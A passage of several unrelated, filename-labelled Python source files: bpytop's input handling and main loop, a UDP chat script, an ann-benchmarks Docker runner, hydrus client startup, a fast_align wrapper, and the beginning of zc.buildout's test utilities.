signal.SIGSTOP) def now_awake(signum, frame): """Set terminal settings and restart background input read""" Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP")) Term.echo(False) Key.start() Term.refresh() Box.calc_sizes() Box.draw_bg() Collector.start() def quit_sigint(signum, frame): """SIGINT redirection to clean_quit()""" clean_quit() def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False): """Stop background input read, save current config and reset terminal settings before quitting""" global THREAD_ERROR if thread: THREAD_ERROR = errcode interrupt_main() return if THREAD_ERROR: errcode = THREAD_ERROR Key.stop() Collector.stop() if not errcode: CONFIG.save_config() Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title()) Term.echo(True) if errcode == 0: errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n') else: errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n') if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!' if errmsg: print(errmsg) raise SystemExit(errcode) def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str: '''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed * bit=True or defaults to bytes * start=int to set 1024 multiplier starting unit * short=True always returns 0 decimals and shortens unit to 1 character ''' out: str = "" mult: int = 8 if bit else 1 selector: int = start unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"] if isinstance(value, float): value = round(value * 100 * mult) elif value > 0: value *= 100 * mult else: value = 0 while len(f'{value}') > 5 and value >= 102400: value >>= 10 if value < 100: out = f'{value}' break selector += 1 else: if len(f'{value}') == 4 and selector > 0: out = f'{value}'[:-2] + "." + f'{value}'[-2] elif len(f'{value}') == 3 and selector > 0: out = f'{value}'[:-2] + "." + f'{value}'[-2:] elif len(f'{value}') >= 2: out = f'{value}'[:-2] else: out = f'{value}' if short: if "." in out: out = f'{round(float(out))}' if len(out) > 3: out = f'{int(out[0]) + 1}' selector += 1 out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}' if per_second: out += "ps" if bit else "/s" return out def units_to_bytes(value: str) -> int: if not value: return 0 out: int = 0 mult: int = 0 bit: bool = False value_i: int = 0 units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3} try: if value.lower().endswith("s"): value = value[:-1] if value.lower().endswith("bit"): bit = True value = value[:-3] elif value.lower().endswith("byte"): value = value[:-4] if value[-1].lower() in units: mult = units[value[-1].lower()] value = value[:-1] if "." in value and value.replace(".", "").isdigit(): if mult > 0: value_i = round(float(value) * 1024) mult -= 1 else: value_i = round(float(value)) elif value.isdigit(): value_i = int(value) if bit: value_i = round(value_i / 8) out = int(value_i) << (10 * mult) except ValueError: out = 0 return out def min_max(value: int, min_value: int=0, max_value: int=100) -> int: return max(min_value, min(value, max_value)) def readfile(file: str, default: str = "") -> str: out: Union[str, None] = None if os.path.isfile(file): try: with open(file, "r") as f: out = f.read().strip() except: pass return default if out is None else out def process_keys(): mouse_pos: Tuple[int, int] = (0, 0) filtered: bool = False global ARG_MODE while Key.has_key(): key = Key.get() if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]: mouse_pos = Key.get_mouse() if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1: pass elif key == "mouse_click": key = "mouse_unselect" else: key = "_null" if ProcBox.filtering: if key in ["enter", "mouse_click", "mouse_unselect"]: ProcBox.filtering = False Collector.collect(ProcCollector, redraw=True, only_draw=True) continue elif key in ["escape", "delete"]: ProcCollector.search_filter = "" ProcBox.filtering = False elif len(key) == 1: ProcCollector.search_filter += key elif key == "backspace" and len(ProcCollector.search_filter) > 0: ProcCollector.search_filter = ProcCollector.search_filter[:-1] else: continue Collector.collect(ProcCollector, proc_interrupt=True, redraw=True) if filtered: Collector.collect_done.wait(0.1) filtered = True continue if key == "_null": continue elif key == "q": clean_quit() elif key == "+" and CONFIG.update_ms + 100 <= 86399900: CONFIG.update_ms += 100 Box.draw_update_ms() elif key == "-" and CONFIG.update_ms - 100 >= 100: CONFIG.update_ms -= 100 Box.draw_update_ms() elif key in ["b", "n"]: NetCollector.switch(key) elif key in ["M", "escape"]: Menu.main() elif key in ["o", "f2"]: Menu.options() elif key in ["h", "f1"]: Menu.help() elif key == "z": NetCollector.reset = not NetCollector.reset Collector.collect(NetCollector, redraw=True) elif key == "y": CONFIG.net_sync = not CONFIG.net_sync Collector.collect(NetCollector, redraw=True) elif key == "a": NetCollector.auto_min = not NetCollector.auto_min NetCollector.net_min = {"download" : -1, "upload" : -1} Collector.collect(NetCollector, redraw=True) elif key in ["left", "right"]: ProcCollector.sorting(key) elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0: if ProcBox.selected_pid in ProcCollector.collapsed: ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid] Collector.collect(ProcCollector, interrupt=True, redraw=True) elif key == "e": CONFIG.proc_tree = not CONFIG.proc_tree Collector.collect(ProcCollector, interrupt=True, redraw=True) elif key == "r": CONFIG.proc_reversed = not CONFIG.proc_reversed Collector.collect(ProcCollector, interrupt=True, redraw=True) elif key == "c": CONFIG.proc_per_core = not CONFIG.proc_per_core Collector.collect(ProcCollector, interrupt=True, redraw=True) elif key == "g": CONFIG.mem_graphs = not CONFIG.mem_graphs Collector.collect(MemCollector, interrupt=True, redraw=True) elif key == "s": Collector.collect_idle.wait() CONFIG.swap_disk = not CONFIG.swap_disk Collector.collect(MemCollector, interrupt=True, redraw=True) elif key == "f": ProcBox.filtering = True if not ProcCollector.search_filter: ProcBox.start = 0 Collector.collect(ProcCollector, redraw=True, only_draw=True) elif key == "m": if ARG_MODE: ARG_MODE = "" elif CONFIG.view_modes.index(CONFIG.view_mode) + 1 > len(CONFIG.view_modes) - 1: CONFIG.view_mode = CONFIG.view_modes[0] else: CONFIG.view_mode = CONFIG.view_modes[(CONFIG.view_modes.index(CONFIG.view_mode) + 1)] Box.proc_mode = CONFIG.view_mode == "proc" Box.stat_mode = CONFIG.view_mode == "stat" Draw.clear(saved=True) Term.refresh(force=True) elif key.lower() in ["t", "k", "i"] and (ProcBox.selected > 0 or ProcCollector.detailed): pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore if psutil.pid_exists(pid): if key.lower() == "t": sig = signal.SIGTERM elif key.lower() == "k": sig = signal.SIGKILL elif key.lower() == "i": sig = signal.SIGINT try: os.kill(pid, sig) except Exception as e: errlog.error(f'Exception when sending signal {sig} to pid {pid}') errlog.exception(f'{e}') elif key == "delete" and ProcCollector.search_filter: ProcCollector.search_filter = "" Collector.collect(ProcCollector, proc_interrupt=True, redraw=True) elif key == "enter": if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid): ProcCollector.detailed = True ProcBox.last_selection = ProcBox.selected ProcBox.selected = 0 ProcCollector.detailed_pid = ProcBox.selected_pid ProcBox.resized = True elif ProcCollector.detailed: ProcBox.selected = ProcBox.last_selection ProcBox.last_selection = 0 ProcCollector.detailed = False ProcCollector.detailed_pid = None ProcBox.resized = True else: continue ProcCollector.details = {} ProcCollector.details_cpu = [] ProcCollector.details_mem = [] Graphs.detailed_cpu = NotImplemented Graphs.detailed_mem = NotImplemented Collector.collect(ProcCollector, proc_interrupt=True, redraw=True) elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect"]: ProcBox.selector(key, mouse_pos) #? Pre main --------------------------------------------------------------------------------------> CPU_NAME: str = get_cpu_name() CORE_MAP: List[int] = get_cpu_core_mapping() THEME: Theme def main(): global THEME Term.width = os.get_terminal_size().columns Term.height = os.get_terminal_size().lines #? Init --------------------------------------------------------------------------------------> if DEBUG: TimeIt.start("Init") #? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP")) Term.echo(False) Term.refresh(force=True) #? Start a thread checking for updates while running init if CONFIG.update_check: UpdateChecker.run() #? Draw banner and init status if CONFIG.show_init and not Init.resized: Init.start() #? Load theme if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}') try: THEME = Theme(CONFIG.color_theme) except Exception as e: Init.fail(e) else: Init.success() #? Setup boxes if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}') try: if CONFIG.check_temp: CpuCollector.get_sensors() Box.calc_sizes() Box.draw_bg(now=False) except Exception as e: Init.fail(e) else: Init.success() #? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}') try: signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z signal.signal(signal.SIGCONT, now_awake) #* Resume signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized except Exception as e: Init.fail(e) else: Init.success() #? Start a separate thread for reading keyboard input if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}') try: Key.start() except Exception as e: Init.fail(e) else: Init.success() #? Start a separate thread for data collection and drawing if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}') try: Collector.start() except Exception as e: Init.fail(e) else: Init.success() #? Collect data and draw to buffer if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}') try: Collector.collect(draw_now=False) pass except Exception as e: Init.fail(e) else: Init.success() #? Draw to screen if CONFIG.show_init: Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}') try: Collector.collect_done.wait() except Exception as e: Init.fail(e) else: Init.success() Init.done() Term.refresh() Draw.out(clear=True) if CONFIG.draw_clock: Box.clock_on = True if DEBUG: TimeIt.stop("Init") #? Main loop -------------------------------------------------------------------------------------> def run(): while not False: Term.refresh() Timer.stamp() while Timer.not_zero(): if Key.input_wait(Timer.left()): process_keys() Collector.collect() #? Start main loop try: run() except Exception as e: errlog.exception(f'{e}') clean_quit(1) else: #? Quit cleanly even if false starts being true... clean_quit() if __name__ == "__main__": main()
chatapp.py
import socket import threading # Using IPv4 and UDP protocol s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ip = input("Enter your IP address: ") port = int(input("Enter your port: ")) # Creating socket s.bind((ip, port)) recvIP = input("Enter the IP of the receiver: ") recvPort = int(input("Enter the port of the receiver: ")) # Function for receiving messages def receiveMessages(): while(True): data = s.recvfrom(1024) data = data[0].decode() print(f'\nReceived message: {data}') # Function for sending messages def sendMessages(): while(True): message = input("Enter the message: ") s.sendto(message.encode(), (recvIP, recvPort)) receive = threading.Thread(target=receiveMessages) send = threading.Thread(target=sendMessages) receive.start() send.start()
runner.py
import argparse import datetime import colors import docker import json import multiprocessing import numpy import os import psutil import requests import sys import threading import time import psutil from ann_benchmarks.datasets import get_dataset, DATASETS from ann_benchmarks.algorithms.definitions import (Definition, instantiate_algorithm, get_algorithm_name) from ann_benchmarks.distance import metrics, dataset_transform from ann_benchmarks.results import store_results def run_individual_query(algo, X_train, X_test, distance, count, run_count, batch, batchsize): prepared_queries = \ (batch and hasattr(algo, "prepare_batch_query")) or \ ((not batch) and hasattr(algo, "prepare_query")) best_search_time = float('inf') for i in range(run_count): print('Run %d/%d...' % (i + 1, run_count)) # a bit dumb but can't be a scalar since of Python's scoping rules n_items_processed = [0] def single_query(v): if prepared_queries: algo.prepare_query(v, count) start = time.time() algo.run_prepared_query() total = (time.time() - start) candidates = algo.get_prepared_query_results() else: start = time.time() candidates = algo.query(v, count) total = (time.time() - start) return (total, v, candidates) def batch_query(X): if prepared_queries: algo.prepare_batch_query(X, count) start = time.time() algo.run_batch_query() total = (time.time() - start) else: start = time.time() algo.batch_query(X, count) total = (time.time() - start) results = algo.get_batch_results() candidates = [[(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa for idx in single_results] for v, single_results in zip(X, results)] return [(total / float(len(X)), v) for v in candidates] def get_candidates(result): total, v, ids = result candidates = [(int(idx), float(metrics[distance]['distance'](v, X_train[idx]))) # noqa for idx in ids] n_items_processed[0] += 1 if n_items_processed[0] % 1000 == 0: print('Processed %d/%d queries...' % (n_items_processed[0], len(X_test))) if len(candidates) > count: print('warning: algorithm %s returned %d results, but count' ' is only %d)' % (algo, len(candidates), count)) return (total, candidates) if batch: if batchsize >= len(X_test): results = batch_query(X_test) else: ress = [batch_query(X_test[batchsize*i:batchsize*(i+1)]) for i in range(int(len(X_test)/batchsize))] tail = len(X_test) % batchsize if tail != 0: ress.append(batch_query(X_test[-tail:])) results = [] for item in ress: results.extend(item) handle_time = 0 else: query_list = [single_query(x) for x in X_test] handle_time, handled_list = algo.handle_query_list_result(query_list) results = [get_candidates(l) for l in handled_list] total_time = sum(time for time, _ in results) + handle_time total_candidates = sum(len(candidates) for _, candidates in results) search_time = total_time / len(X_test) # print("search_time: ", search_time) avg_candidates = total_candidates / len(X_test) best_search_time = min(best_search_time, search_time) verbose = hasattr(algo, "query_verbose") attrs = { "batch_mode": batch, "best_search_time": best_search_time, "candidates": avg_candidates, "expect_extra": verbose, "name": str(algo), "run_count": run_count, "distance": distance, "count": int(count) } additional = algo.get_additional() for k in additional: attrs[k] = additional[k] return (attrs, results) def run(definition, dataset, count, run_count, batch, batchsize): algo = instantiate_algorithm(definition) assert not definition.query_argument_groups \ or hasattr(algo, "set_query_arguments"), """\ error: query argument groups have been specified for %s.%s(%s), but the \ algorithm instantiated from it does not implement the set_query_arguments \ function""" % (definition.module, definition.constructor, definition.arguments) D = get_dataset(dataset) X_train = numpy.array(D['train']) X_test = numpy.array(D['test']) distance = D.attrs['distance'] print('got a train set of size (%d * %d)' % X_train.shape) print('got %d queries' % len(X_test)) X_train = dataset_transform[distance](X_train) X_test = dataset_transform[distance](X_test) try: prepared_queries = False if hasattr(algo, "supports_prepared_queries"): prepared_queries = algo.supports_prepared_queries() t0 = time.time() memory_usage_before = algo.get_memory_usage() algo.fit(X_train) build_time = time.time() - t0 index_size = algo.get_memory_usage() - memory_usage_before print('Built index in', build_time) print('Index size: ', index_size) query_argument_groups = definition.query_argument_groups # Make sure that algorithms with no query argument groups still get run # once by providing them with a single, empty, harmless group if not query_argument_groups: query_argument_groups = [[]] for pos, query_arguments in enumerate(query_argument_groups, 1): print("Running query argument group %d of %d..." % (pos, len(query_argument_groups))) if query_arguments: algo.set_query_arguments(*query_arguments) descriptor, results = run_individual_query( algo, X_train, X_test, distance, count, run_count, batch, batchsize) descriptor["build_time"] = build_time descriptor["index_size"] = index_size descriptor["algo"] = get_algorithm_name( definition.algorithm, batch) descriptor["dataset"] = dataset store_results(dataset, count, definition, query_arguments, descriptor, results, batch) finally: algo.done() def run_from_cmdline(): parser = argparse.ArgumentParser() parser.add_argument( '--dataset', # choices=DATASETS.keys(), required=True) parser.add_argument( '--algorithm', required=True) parser.add_argument( '--module', required=True) parser.add_argument( '--constructor', required=True) parser.add_argument( '--count', required=True, type=int) parser.add_argument( '--runs', required=True, type=int) parser.add_argument( '--batchsize', required=True, type=int) parser.add_argument( '--batch', action='store_true') parser.add_argument( 'build') parser.add_argument( 'queries', nargs='*', default=[]) args = parser.parse_args() algo_args = json.loads(args.build) query_args = [json.loads(q) for q in args.queries] definition = Definition( algorithm=args.algorithm, docker_tag=None, # not needed module=args.module, constructor=args.constructor, arguments=algo_args, query_argument_groups=query_args, disabled=False ) run(definition, args.dataset, args.count, args.runs, args.batch, args.batchsize) def run_docker(definition, dataset, count, runs, timeout, batch, cpu_limit, batchsize, mem_limit=None): cmd = ['--dataset', dataset, '--algorithm', definition.algorithm, '--module', definition.module, '--constructor', definition.constructor, '--runs', str(runs), '--count', str(count)] if batch: cmd += ['--batchsize', str(batchsize)] cmd += ['--batch'] cmd.append(json.dumps(definition.arguments)) cmd += [json.dumps(qag) for qag in definition.query_argument_groups] print('Running command', cmd) client = docker.from_env() if mem_limit is None: mem_limit = psutil.virtual_memory().available print('Memory limit:', mem_limit) if batch: cpu_limit = "0-%d" % (multiprocessing.cpu_count() - 1) print('Running on CPUs:', cpu_limit) logic_cpu_num = psutil.cpu_count(logical=True) omp_thread = logic_cpu_num * 2 // 3 if logic_cpu_num > 1 else 1 container = client.containers.run( definition.docker_tag, cmd, volumes={ os.path.abspath('ann_benchmarks'): {'bind': '/home/app/ann_benchmarks', 'mode': 'ro'}, os.path.abspath('data'): {'bind': '/home/app/data', 'mode': 'ro'}, os.path.abspath('results'): {'bind': '/home/app/results', 'mode': 'rw'}, }, environment=["OMP_NUM_THREADS={}".format(omp_thread)], # cpuset_cpus=cpu_limit, # mem_limit=mem_limit, detach=True) def stream_logs(): for line in container.logs(stream=True): print(colors.color(line.decode().rstrip(), fg='blue')) if sys.version_info >= (3, 0): t = threading.Thread(target=stream_logs, daemon=True) else: t = threading.Thread(target=stream_logs) t.daemon = True t.start() try: exit_code = container.wait(timeout=timeout) # Exit if exit code if exit_code == 0: return elif exit_code is not None: print(colors.color(container.logs().decode(), fg='red')) raise Exception('Child process raised exception %d' % exit_code) finally: container.remove(force=True)
hydrus_client.py
#!/usr/bin/env python3 # Hydrus is released under WTFPL # You just DO WHAT THE FUCK YOU WANT TO. # https://github.com/sirkris/WTFPL/blob/master/WTFPL.md import locale try: locale.setlocale( locale.LC_ALL, '' ) except: pass try: import os import argparse import sys from hydrus.core import HydrusBoot HydrusBoot.AddBaseDirToEnvPath() # initialise Qt here, important it is done early from hydrus.client.gui import QtPorting as QP from hydrus.core import HydrusConstants as HC from hydrus.core import HydrusData from hydrus.core import HydrusLogger from hydrus.core import HydrusPaths from hydrus.core import HydrusGlobals as HG argparser = argparse.ArgumentParser( description = 'hydrus network client' ) argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' ) argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' ) argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' ) argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=200)' ) argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' ) argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' ) argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' ) argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' ) argparser.add_argument( '--no_daemons', action='store_true', help = 'run without background daemons' ) argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' ) argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' ) result = argparser.parse_args() if result.db_dir is None: db_dir = HC.DEFAULT_DB_DIR if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP: if HC.USERPATH_DB_DIR is None: raise Exception( 'The default db path "{}" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) ) db_dir = HC.USERPATH_DB_DIR else: db_dir = result.db_dir db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR ) if not HydrusPaths.DirectoryIsWriteable( db_dir ): raise Exception( 'The given db path "{}" is not a writeable-to!'.format( db_dir ) ) try: HydrusPaths.MakeSureDirectoryExists( db_dir ) except: raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) ) if not os.path.isdir( db_dir ): raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) ) HG.no_daemons = result.no_daemons HG.db_journal_mode = result.db_journal_mode if result.no_wal: HG.db_journal_mode = 'TRUNCATE' if result.db_memory_journaling: HG.db_journal_mode = 'MEMORY' if result.db_cache_size is not None: HG.db_cache_size = result.db_cache_size else: HG.db_cache_size = 200 if result.db_transaction_commit_period is not None: HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period ) else: HG.db_transaction_commit_period = 30 if result.db_synchronous_override is not None: HG.db_synchronous = int( result.db_synchronous_override ) else: if HG.db_journal_mode == 'WAL': HG.db_synchronous = 1 else: HG.db_synchronous = 2 HG.no_db_temp_files = result.no_db_temp_files HG.boot_debug = result.boot_debug try: from twisted.internet import reactor except: HG.twisted_is_broke = True except Exception as e: try: HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' ) HydrusData.PrintException( e ) except: pass import traceback error_trace = traceback.format_exc() print( error_trace ) if 'db_dir' in locals() and os.path.exists( db_dir ): emergency_dir = db_dir else: emergency_dir = os.path.expanduser( '~' ) possible_desktop = os.path.join( emergency_dir, 'Desktop' ) if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ): emergency_dir = possible_desktop dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' ) with open( dest_path, 'w', encoding = 'utf-8' ) as f: f.write( error_trace ) print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' ) sys.exit( 1 ) def boot(): if result.temp_dir is not None: HydrusPaths.SetEnvTempDir( result.temp_dir ) controller = None with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger: try: HydrusData.Print( 'hydrus client started' ) if not HG.twisted_is_broke: import threading threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start() from hydrus.client import ClientController controller = ClientController.Controller( db_dir ) controller.Run() except: HydrusData.Print( 'hydrus client failed' ) import traceback HydrusData.Print( traceback.format_exc() ) finally: HG.view_shutdown = True HG.model_shutdown = True if controller is not None: controller.pubimmediate( 'wake_daemons' ) if not HG.twisted_is_broke: reactor.callFromThread( reactor.stop ) HydrusData.Print( 'hydrus client shut down' ) HG.shutdown_complete = True if HG.restart: HydrusData.RestartProcess()
force_align.py
#!/usr/bin/env python # # This code is partially taken from the force_align.py script of cdec project # import os import subprocess import sys import threading # Simplified, non-threadsafe version for force_align.py # Use the version in realtime for development class Aligner: def __init__(self, fwd_params, fwd_err, rev_params, rev_err, heuristic='grow-diag-final-and'): if not os.environ.has_key('CDEC_HOME'): sys.stderr.write('CDEC_HOME not specified\n') sys.exit(2) cdec_root = os.environ['CDEC_HOME'] fast_align = os.path.join(cdec_root, 'word-aligner', 'fast_align') atools = os.path.join(cdec_root, 'utils', 'atools') (fwd_T, fwd_m) = self.read_err(fwd_err) (rev_T, rev_m) = self.read_err(rev_err) fwd_cmd = [fast_align, '-i', '-', '-d', '-T', fwd_T, '-m', fwd_m, '-f', fwd_params] rev_cmd = [fast_align, '-i', '-', '-d', '-T', rev_T, '-m', rev_m, '-f', rev_params, '-r'] tools_cmd = [atools, '-i', '-', '-j', '-', '-c', heuristic] self.fwd_align = popen_io(fwd_cmd) self.rev_align = popen_io(rev_cmd) self.tools = popen_io(tools_cmd) def align(self, line): self.fwd_align.stdin.write('{}\n'.format(line.encode('utf-8'))) self.rev_align.stdin.write('{}\n'.format(line.encode('utf-8'))) # f words ||| e words ||| links ||| score fwd_line = self.fwd_align.stdout.readline().split('|||')[2].strip() rev_line = self.rev_align.stdout.readline().split('|||')[2].strip() self.tools.stdin.write('{}\n'.format(fwd_line)) self.tools.stdin.write('{}\n'.format(rev_line)) al_line = self.tools.stdout.readline().strip() return al_line def close(self): self.fwd_align.stdin.close() self.fwd_align.wait() self.rev_align.stdin.close() self.rev_align.wait() self.tools.stdin.close() self.tools.wait() def read_err(self, err): (T, m) = ('', '') for line in open(err): # expected target length = source length * N if 'expected target length' in line: m = line.split()[-1] # final tension: N elif 'final tension' in line: T = line.split()[-1] return (T, m) def popen_io(cmd): p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) def consume(s): for _ in s: pass threading.Thread(target=consume, args=(p.stderr,)).start() return p def main(): if len(sys.argv[1:]) < 4: sys.stderr.write('run:\n') sys.stderr.write(' fast_align -i corpus.f-e -d -v -o -p fwd_params >fwd_align 2>fwd_err\n') sys.stderr.write(' fast_align -i corpus.f-e -r -d -v -o -p rev_params >rev_align 2>rev_err\n') sys.stderr.write('\n') sys.stderr.write('then run:\n') sys.stderr.write(' {} fwd_params fwd_err rev_params rev_err [heuristic] <in.f-e >out.f-e.gdfa\n'.format(sys.argv[0])) sys.stderr.write('\n') sys.stderr.write('where heuristic is one of: (intersect union grow-diag grow-diag-final grow-diag-final-and) default=grow-diag-final-and\n') sys.exit(2) aligner = Aligner(*sys.argv[1:]) while True: line = sys.stdin.readline() if not line: break line = line[:-1].decode('utf-8') sys.stdout.write('{}\n'.format(aligner.align(line.strip()))) sys.stdout.flush() aligner.close() if __name__ == '__main__': main()
testing.py
############################################################################# # # Copyright (c) 2004-2009 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """Various test-support utility functions """ try: # Python 3 from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.request import urlopen except ImportError: # Python 2 from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from urllib2 import urlopen import errno import logging import os import pkg_resources import random import re import shutil import socket import subprocess import sys import tempfile import threading import time import zc.buildout.buildout import zc.buildout.easy_install from zc.buildout.rmtree import rmtree print_ = zc.buildout.buildout.print_ fsync = getattr(os, 'fsync', lambda fileno: None) is_win32 = sys.platform == 'win32' setuptools_location = pkg_resources.working_set.find( pkg_resources.Requirement.parse('setuptools')).location def cat(dir, *names): path = os.path.join(dir, *names) if (not os.path.exists(path) and is_win32 and os.path.exists(path+'-script.py') ): path = path+'-script.py' with open(path) as f: print_(f.read(), end='') def ls(dir, *subs): if subs: dir = os.path.join(dir, *subs) names = sorted(os.listdir(dir)) for name in names: if os.path.isdir(os.path.join(dir, name)): print_('d ', end=' ') elif os.path.islink(os.path.join(dir, name)): print_('l ', end=' ') else: print_('- ', end=' ') print_(name) def mkdir(*path): os.mkdir(os.path.join(*path)) def remove(*path): path = os.path.join(*path) if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def rmdir(*path): shutil.rmtree(os.path.join(*path)) def write(dir, *args): path = os.path.join(dir, *(args[:-1])) f = open(path, 'w') f.write(args[-1]) f.flush() fsync(f.fileno()) f.close() def clean_up_pyc(*path): base, filename = os.path.join(*path[:-1]), path[-1] if filename.endswith('.py'): filename += 'c' # .py -> .pyc for path in ( os.path.join(base, filename), os.path.join(base, '__pycache__'), ): if os.path.isdir(path): rmdir(path) elif os.path.exists(path): remove(path) ## FIXME - check for other platforms MUST_CLOSE_FDS = not sys.platform.startswith('win') def system(command, input='', with_exit_code=False): p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=MUST_CLOSE_FDS) i, o, e = (p.stdin, p.stdout, p.stderr) if input: i.write(input.encode()) i.close() result = o.read() + e.read() o.close() e.close() output = result.decode() if with_exit_code: # Use the with_exit_code=True parameter when you want to test the exit # code of the command you're running. output += 'EXIT CODE: %s' % p.wait() return output def get(url): return str(urlopen(url).read().decode()) def _runsetup(setup, *args): if os.path.isdir(setup): setup = os.path.join(setup, 'setup.py') args = list(args) args.insert(0, '-q') here = os.getcwd() try: os.chdir(os.path.dirname(setup)) zc.buildout.easy_install.call_subprocess( [sys.executable, setup] + args, env=dict(os.environ, PYTHONPATH=setuptools_location)) if os.path.exists('build'): rmtree('build') finally: os.chdir(here) def sdist(setup, dest): _runsetup(setup, 'sdist', '-d', dest, '--formats=zip') def bdist_egg(setup, executable, dest=None): # Backward compat: if dest is None: dest = executable else: assert executable == sys.executable, (executable, sys.executable) _runsetup(setup, 'bdist_egg', '-d', dest) def wait_until(label, func, *args, **kw): if 'timeout' in kw: kw = dict(kw) timeout = kw.pop('timeout') else: timeout = 30 deadline = time.time()+timeout while time.time() < deadline: if func(*args, **kw): return time.sleep(0.01) raise ValueError('Timed out waiting for: '+label) class Buildout(zc.buildout.buildout.Buildout): def __init__(self): zc.buildout.buildout.Buildout.__init__( self, '', [('buildout', 'directory', os.getcwd())]) def initialize(self, *args): pass def buildoutSetUp(test): test.globs['__tear_downs'] = __tear_downs = [] test.globs['register_teardown'] = register_teardown = __tear_downs.append prefer_final = zc.buildout.easy_install.prefer_final() register_teardown( lambda: zc.buildout.easy_install.prefer_final(prefer_final) ) here = os.getcwd() register_teardown(lambda: os.chdir(here)) handlers_before_set_up = logging.getLogger().handlers[:] def restore_root_logger_handlers(): root_logger = logging.getLogger() for handler in root_logger.handlers[:]: root_logger.removeHandler(handler) for handler in handlers_before_set_up: root_logger.addHandler(handler) register_teardown(restore_root_logger_handlers) base = tempfile.mkdtemp('buildoutSetUp') base = os.path.realpath(base) register_teardown(lambda base=base: 